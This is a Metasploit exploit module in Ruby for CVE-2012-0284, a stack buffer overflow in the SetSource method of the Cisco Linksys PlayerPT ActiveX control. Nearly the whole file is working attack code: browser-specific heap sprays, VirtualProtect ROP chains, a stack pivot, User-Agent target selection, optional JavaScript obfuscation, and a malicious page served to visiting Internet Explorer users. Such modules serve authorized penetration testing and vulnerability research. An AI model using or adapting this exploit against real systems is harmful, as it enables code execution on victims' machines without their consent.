## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::Seh include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "6.0", :ua_maxver => "9.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, :classid => "{9E065E4A-BD9D-4547-8F90-985DC62A5591}", :method => "SetSource", :rank => NormalRanking }) def initialize(info = {}) super(update_info(info, 'Name' => 'Cisco Linksys PlayerPT ActiveX Control SetSource sURL argument Buffer Overflow', 'Description' => %q{ This module exploits a vulnerability found in Cisco Linksys PlayerPT 1.0.0.15 as the installed with the web interface of Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera. The vulnerability, due to the insecure usage of sprintf in the SetSource method, when handling a specially crafted sURL argument, allows to trigger a stack based buffer overflow which leads to code execution under the context of the user visiting a malicious web page. }, 'Author' => [ 'Carsten Eiram', # Vuln discovery 'juan' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2012-0284' ], [ 'BID', '54588' ], [ 'URL', 'http://secunia.com/secunia_research/2012-25/' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 6 on Windows XP SP3', { 'SprayBlocks' => 0x185, 'SprayOffset' => '0x0', 'Ret' => 0x0c0c0c0c, 'Rop' => nil, 'RandomHeap' => false } ], [ 'IE 7 on Windows XP SP3 / Windows Vista SP2', { 'SprayBlocks' => 0x185, 'SprayOffset' => '0x0', 'Ret' => 0x0c0c0c0c, 'Rop' => nil, 'RandomHeap' => false } ], [ 'IE 8 on Windows XP SP3', { 'SprayBlocks' => 0x185, 'SprayOffset' => '0x0', 'Ret' => 0x77c3546b, # ret from msvcrt 'StackPivot_1' => 0x77c3546a, # pop ebp; ret from msvcrt 'StackPivot_2' => 0x77c35468, # mov esp,ebp; pop ebp; ret from msvcrt 'Rop' => :msvcrt, 'RopChainOffset' => '0x5f4', 'RandomHeap' => false } ], [ 'IE 8 with Java 6 on Windows XP SP3', { 'SprayBlocks' => 0x185, 'SprayOffset' => '0x0', 'Ret' => 0x7c3424f2, # ret from msvcr71.dll 'StackPivot_1' => 0x7c3424f1, # pop ebp; ret from msvcr71.dll 'StackPivot_2' => 0x7c3424ef, # mov esp,ebp; pop ebp; ret from msvcr71.dll 'Rop' => :jre, 'RopChainOffset' => '0x5f4', 'RandomHeap' => false } ], [ 'IE 8 with Java 6 on Windows 7 SP1/Vista SP2', { 'SprayBlocks' => 0x185, 'SprayOffset' => '0x0', 'Ret' => 0x7c3424f2, # ret from msvcr71.dll 'StackPivot_1' => 0x7c3424f1, # pop ebp; ret from msvcr71.dll 'StackPivot_2' => 0x7c3424ef, # mov esp,ebp; pop ebp; ret from msvcr71.dll 'Rop' => :jre, 'RopChainOffset' => '0x5f4', 'RandomHeap' => false } ], [ 'IE 9 with Java 6 on Windows 7 SP1', { 'SprayBlocks' => 0x1000, 'SprayOffset' => '0x0', 'Ret' => 0x7c3424f2, # ret from msvcr71.dll 'StackPivot_1' => 0x7c3424f1, # pop ebp; ret from msvcr71.dll 'StackPivot_2' => 0x7c3424ef, # mov esp,ebp; pop ebp; ret from msvcr71.dll 'Rop' => :jre, 'RopChainOffset' => '0x5fe', 'RandomHeap' => true, } ] ], 'Privileged' => false, 'DisclosureDate' => 'Jul 17 2012', 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class ) end def get_easy_spray(t, js_code, js_nops) spray = <<-JS var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{t['SprayOffset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var z=1; z < #{t['SprayBlocks']}; z++) { heap_obj.alloc(block); } JS return spray end def get_aligned_spray(t, js_rop, js_code, js_nops, js_90_nops) spray = <<-JS var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); var nops_90 = unescape("#{js_90_nops}"); var rop_chain = unescape("#{js_rop}"); while (nops.length < 0x80000) nops += nops; while (nops_90.length < 0x80000) nops_90 += nops_90; var offset = nops.substring(0, #{t['SprayOffset']}); var nops_padding = nops.substring(0, #{t['RopChainOffset']}-code.length-offset.length); var shellcode = offset + code + nops_padding + rop_chain + nops_90.substring(0, 0x800-code.length-nops_padding.length-rop_chain.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var z=1; z < #{t['SprayBlocks']}; z++) { heap_obj.alloc(block); } JS return spray end # Spray published by corelanc0d3r # Exploit writing tutorial part 11 : Heap Spraying Demystified # See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/ def get_random_spray(t, js_rop, js_code, js_90_nops) spray = <<-JS function randomblock(blocksize) { var theblock = ""; for (var i = 0; i < blocksize; i++) { theblock += Math.floor(Math.random()*90)+10; } return theblock; } function tounescape(block) { var blocklen = block.length; var unescapestr = ""; for (var i = 0; i < blocklen-1; i=i+4) { unescapestr += "%u" + block.substring(i,i+4); } return unescapestr; } var heap_obj = new heapLib.ie(0x10000); var rop = unescape("#{js_rop}"); var code = unescape("#{js_code}"); var nops_90 = unescape("#{js_90_nops}"); while (nops_90.length < 0x80000) nops_90 += nops_90; var offset_length = #{t['RopChainOffset']}; for (var i=0; i < #{t['SprayBlocks']}; i++) { var padding = unescape(tounescape(randomblock(0x1000))); while (padding.length < 0x1000) padding+= padding; var junk_offset = padding.substring(0, offset_length - code.length); var single_sprayblock = code + junk_offset + rop + nops_90.substring(0, 0x800 - code.length - junk_offset.length - rop.length); while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock; sprayblock = single_sprayblock.substring(0, (0x40000-6)/2); heap_obj.alloc(sprayblock); } JS return spray end def junk(n=4) return rand_text_alpha(n).unpack("V").first end def nop return make_nops(4).unpack("V").first end def get_stack_pivot(t) stack_pivot = [ junk, junk, junk, junk, junk, t['StackPivot_1'], # pop ebp # ret # ESP points here after controlling EIP with overflow 0x0c0c0c08, # ebp t['StackPivot_2'] # mov esp,ebp # pop ebp # ret ].pack("V*") return stack_pivot end def get_rop_chain(t) # Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :msvcrt print_status("Using msvcrt ROP") rop = [ 0x77C21891, # POP ESI # RETN 0x0c0c0c04, # ESI 0x77c4e392, # POP EAX # RETN 0x77c11120, # <- *&VirtualProtect() 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN junk, 0x77c2dd6c, # XCHG EAX,ESI # ADD BYTE PTR [EAX],AL # RETN 0x77c4ec00, # POP EBP # RETN 0x77c35459, # ptr to 'push esp # ret' 0x77c47705, # POP EBX # RETN 0x00001000, # EBX 0x77c3ea01, # POP ECX # RETN 0x77c5d000, # W pointer (lpOldProtect) (-> ecx) 0x77c46100, # POP EDI # RETN 0x77c46101, # ROP NOP (-> edi) 0x77c4d680, # POP EDX # RETN 0x00000040, # newProtect (0x40) (-> edx) 0x77c4e392, # POP EAX # RETN nop, # NOPS (-> eax) 0x77c12df9, # PUSHAD # RETN ].pack("V*") when :jre print_status("Using JRE ROP") rop = [ 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN 0x00001000, # (dwSize) 0x7c347f98, # RETN (ROP NOP) 0x7c3415a2, # JMP [EAX] 0xffffffff, 0x7c376402, # skip 4 bytes 0x7c345255, # INC EBX # FPATAN # RETN 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN 0x7c344f87, # POP EDX # RETN 0x00000040, # flNewProtect 0x7c34d201, # POP ECX # RETN 0x7c38b001, # &Writable location 0x7c347f97, # POP EAX # RETN 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN 0x7c345c30, # ptr to 'push esp # ret ' ].pack("V*") end return rop end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/ return targets[1] #IE 6 on Windows XP SP3 elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/ return targets[2] #IE 7 on Windows XP SP3 elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/ return targets[2] #IE 7 on Windows Vista SP2 elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/ return targets[3] #IE 8 on Windows XP SP3 elsif agent =~ /NT 6\.[01]/ and agent =~ /MSIE 8/ return targets[5] #IE 8 on Windows 7 SP1/Vista SP2 elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/ return targets[6] #IE 9 on Windows 7 SP1 else return nil end end def on_request_uri(cli, request) agent = request.headers['User-Agent'] print_status("User-agent: #{agent}") my_target = get_target(agent) # Avoid the attack if the victim doesn't have a setup we're targeting if my_target.nil? print_error("Browser not supported: #{agent}") send_not_found(cli) return end p = payload.encoded js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch)) js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) if not my_target['Rop'].nil? js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch)) end js = "" if my_target['RandomHeap'] js = get_random_spray(my_target, js_rop, js_code, js_90_nops) elsif not my_target['Rop'].nil? js = get_aligned_spray(my_target, js_rop, js_code, js_nops, js_90_nops) else js = get_easy_spray(my_target, js_code, js_nops) end js = heaplib(js, {:noobfu => true}) if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end sploit = "http://" sploit << "\x0c" * 261 sploit << [my_target.ret].pack("V") if not my_target['Rop'].nil? sploit << get_stack_pivot(my_target) end sploit << "/img/video.asf" html = <<-MYHTML <html> <head> <script> #{js} </script> </head> <body> <object classid='clsid:9E065E4A-BD9D-4547-8F90-985DC62A5591' id='obj' /></object> <script> obj.SetSource("#{sploit}","mpeg","","",""); </script> </body> </html> MYHTML html = html.gsub(/^\t\t/, '') print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) end end